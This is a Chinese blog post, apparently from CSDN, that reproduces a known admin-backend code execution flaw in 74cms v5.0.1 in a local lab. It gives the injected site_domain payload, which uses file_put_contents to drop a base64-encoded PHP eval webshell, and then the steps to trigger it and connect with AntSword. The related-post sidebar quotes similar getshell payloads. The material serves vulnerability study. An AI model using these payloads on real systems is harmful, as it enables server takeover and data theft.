74cms v5.0.1 漏洞复现

最新推荐文章于 2024-03-25 09:16:23 发布
最新推荐文章于 2024-03-25 09:16:23 发布
阅读量3.1k 收藏 9
点赞数 1
分类专栏: 渗透测试 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_lang/article/details/124513778
版权

一、环境搭建

这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。
1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html
请添加图片描述
2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。
请添加图片描述
3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

OK,系统安装完成。

二、漏洞利用

1.登录后台以后,点击保存网站配置的同时用burpsuite抓包。
请添加图片描述
请添加图片描述
2.修改site_domain的内容,这里对内容进行base64加密:site_domain=‘,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgmX1BPU1QoJzEyMycpKTs/Pg==’)),’
请添加图片描述
3.这里等号需要URL编码

请添加图片描述
4.再次访问:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/url.php,使恶意语句成功执行。
请添加图片描述
5.一句话木马已被写入:
在这里插入图片描述

6.使用蚁剑连接:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/403.php
在这里插入图片描述
OK,连接成功,over。

成都残疾人驾校彭老师
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
74cms -v3.0 存储型xss 分析与
Au_Wind的博客
11-06 308
骑士cms3.0版本存储型xss分析
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 337
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74CMS漏洞
小小猪的博客
12-01 4171
74CMS漏洞 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境: 这里采用安鸾渗透实战平台的靶机 地址 漏洞: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发报错 访问 www.whalwl.site:8019/in..
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 714
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
74cms|骑士cms|开源招聘系统,数据结构
beyond__devil的博客
10-23 8333
这个可是我花了3、4天时间,详细总结的,不知道公布出来,官方应该也不会找我吧。74cms是一个开源的招聘系统,我研究了下系统、代码,总结了下数据结构,网上应该是没有的。 觉得好的点个赞,我这几天真的挺辛苦的。。。 74cms3.7数据结构统计:     config - 系统配置         id         name - 配置项         value - 值
74cms 6.0.20 getshell
m0_51377238的博客
12-16 319
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。http://serverName/index.php/模块/控制器/操作m参数表示模块,c参数表示控制器,a参数表示操作/方法,后面的表示其他GET参数。
74cms 骑士人才系统 v5.0.1 正式版
10-02
总的来说,74cms骑士人才系统v5.0.1正式版是一个功能完备、易于定制的人才招聘解决方案,适用于各类企业。通过其高效的执行、丰富的功能和灵活的设计,企业能够更好地管理和运营自己的招聘流程,吸引并留住优秀的...
74cms5.0.1RCE漏洞环境源码
10-18
74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版.zip
07-16
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版 更新日志  新增:后台增加跳转页面 新增:短信预警提醒,方便客户及时充值 新增:企业与个人账号通用 新增:未付费且登录的企业单独呈,方便追踪客户 新增:...
74CMS_v5.0.1后台RCE分析1
08-03
【74CMS_v5.0.1后台RCE分析】主要涉及的是74CMS内容管理系统的一个远程代码执行(Remote Code Execution, RCE)漏洞。这个漏洞发生在系统的后台管理部分,需要用户具有管理员权限才能利用。漏洞的触发点在于系统允许...
74cms人才系统3.4升级3.5企业版免密码,骑士人才cms3.4升级3.5
12-20
74cms人才系统3.4升级3.5企业版免密码,骑士人才cms3.4升级3.5,淘宝买的 ,自测可用
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、过程
YzmCMS轻量级开源CMS v5.0.1
10-11
YzmCMS是一款轻量级开源内容管理系统,它采用OOP(面向对象)方式自主开发的框架。基于PHP+Mysql架构,并采用MVC框架式开发的一款高效开源的内容管理系统,可运行在Linux、Windows、Mac
渗透年入百万人才管理系统【附poc】
最新发布
jijisaq的博客
03-25 804
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。公众号:「吉吉说安全」,对我发消息【20240325】免费获取poc。
vulfocus——骑士cms任意代码执行(CVE-2020-35339)
m0_62063669的博客
09-17 954
5.访问shell地址:/Application/Home/Conf/config.php。骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。(不知道这里为什么没出flag,然后在phpinfo找到flag)后台账号密码均为adminadmin。4.构造Payload验证漏洞存在。6.getshell (改包)3.在第三步进行抓包。2.找到后台登陆界面。
骑士cms任意代码执行(CVE-2020-35339)
qq_34341458的博客
04-12 3537
本文章仅供学习使用,如用作非法用途,概不负责 0x01 漏洞介绍 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。
74cms v4.2.1-v4.2.129-后台getshell漏洞
浅笑996的博客
06-28 1269
0x00 影响范围 v4.2.1-v4.2.129 0x01 环境搭建 1. 先去官网下载 骑士人才系统基础版(安装包) 2.将下载好的包进行安装 0x02 过程 当前版本v4.2.111 点加工具,点击风格模板 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0....
74cms代码执行漏洞
抚琴
01-03 2068
74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞 http://192.168.107.131:1026/upload/index.php?m=admin&c=index&a=index http://192.168.107.131:1026/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=%27,%27a%27,eval($_GET[1]),%27 http://192.168.107.13
"74CMS_v5.0.1 后台 RCE 漏洞分析及利用条件简介
74CMS_v5.0.1后台RCE漏洞分析 在本次漏洞分析中,我们将对74CMS_v5.0.1后台RCE漏洞进行深入分析。该漏洞主要存在于后台管理账户中,需要登录后台管理账户才能够实RCE。但是在漏洞的挖掘思路以及利用过程中,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成都残疾人驾校彭老师

你的 打赏将是我的进步的一大动

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值